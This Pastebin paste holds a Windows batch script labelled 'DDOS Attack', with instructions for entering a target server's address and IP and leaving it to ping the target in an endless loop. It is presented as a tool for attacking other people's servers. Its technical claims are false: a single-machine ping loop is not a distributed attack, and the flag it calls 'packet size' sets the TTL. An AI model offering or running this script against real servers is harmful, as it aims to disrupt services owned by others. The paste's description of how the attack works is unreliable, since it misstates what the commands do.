Advertisement
ukesh

new ddos

Feb 25th, 2015
336
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.96 KB | None | 0 0
  1. @echo off
  2. mode 67,16
  3. title DDOS Attack (Created by
  4. ANONOMOUS MJ)
  5. color 0a
  6. cls
  7. echo.
  8. echo
  9. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  10. echo ANONOMOUS MJ'S DDOS
  11. echo
  12. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  13. echo.
  14. set /p x=Server-Target:
  15. echo.
  16. echo
  17. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  18. ping %x%
  19. echo
  20. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  21. @ping.exe 127.0.0.1 -n 5 -w 1000 >
  22. nul
  23. goto Next
  24. :Next
  25. echo.
  26. echo.
  27. echo.
  28. set /p m=IP Host:
  29. echo.
  30. set /p n=Packet Size:
  31. echo.
  32. :DDOS
  33. color 0c
  34. echo Attacking Server %m%
  35. ping %m% -i %n% -t >nul
  36. goto DDOS
  37. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  38. --------------------------------
  39. Step 3: Save the file as DDOS.bat
  40. You have now Created the File
  41. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  42. --------------------------------
  43. How to use the DDOS
  44. When it says Server-Target type the
  45. web address of the server that you
  46. would like to DDOS
  47. Then you should realise that it will
  48. come up Pinging (your web address
  49. here)
  50. Now you should notice that the
  51. server of the person you would like
  52. to DDOS has appeared
  53. Next it should come up IP Host : here
  54. is where you type the servers IP
  55. Now it should pop up Packets : here
  56. you have to type 5000,000
  57. Now it should keep repeating
  58. Attacking server in red now you have
  59. successfully DDOS the server
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement